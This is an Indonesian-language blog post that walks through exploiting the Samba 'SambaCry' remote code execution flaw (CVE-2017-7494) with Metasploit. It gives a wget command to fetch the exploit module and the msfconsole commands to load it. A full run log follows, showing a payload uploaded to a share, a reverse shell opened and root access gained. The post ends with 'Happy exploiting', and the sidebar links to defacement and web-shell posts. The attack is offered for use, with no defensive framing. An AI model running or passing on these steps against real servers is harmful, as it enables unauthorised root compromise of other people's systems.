• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Samba 3.5.0 – Remote Code Execution (CVE-2017-7494) Metasploit

May 26, 2017 by Jack Wilder Leave a Comment

Hmm sepertinya Remote Code Exploit juga menyerang Samba File Sharing di Linux nih? Akankah ada versi WannaCry Linux yang memanfaatkan celah ini? Atau harusnya diberi nama Sambacry?

wget https://raw.githubusercontent.com/hdm/metasploit-framework/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O /path/to/metasploit/modules/exploits/linux/samba/sambacry.rb

msfconsole
msf > use exploit/linux/samba/sambacry
msf exploit(sambacry) >

Logs :

[*] Started reverse TCP handler on 192.168.48.1:4444
[*] 192.168.48.151:445 - Using location 192.168.48.151shared for the path
[*] 192.168.48.151:445 - Payload is stored in //192.168.48.151/shared/ as nCiuzQVt.so
[*] 192.168.48.151:445 - Trying location /volume1/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume1/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume1/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume1/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume2/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume2/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /home/nCiuzQVt.so...
[*] Command shell session 2 opened (192.168.48.1:4444  -> 192.168.48.1:45072) at 2017-05-24 19:40:33 -0500
id
uid=0(root) gid=0(root) groups=0(root),100(users)

Kalau ada yang bingung silahkan tanya. Happy exploiting.

Filed Under: Metasploit Tagged With: Exploit, Linux, Metasploit

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

Exploit WPStore Themes Upload Vulnerability

Uptimerobot.com Custom Domain or Subdomain Takeover

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

Mass Deface setelah Rooting Server

Deface dengan Metode Timthumb Remote Code Execution

RCE pada Redis via Master-Slave Replication

WordPress Plugin CopySafe PDF Protection Shell Upload

Command Injection Bypass Cheatsheet

LinuxSec / 14 queries in 0.10 seconds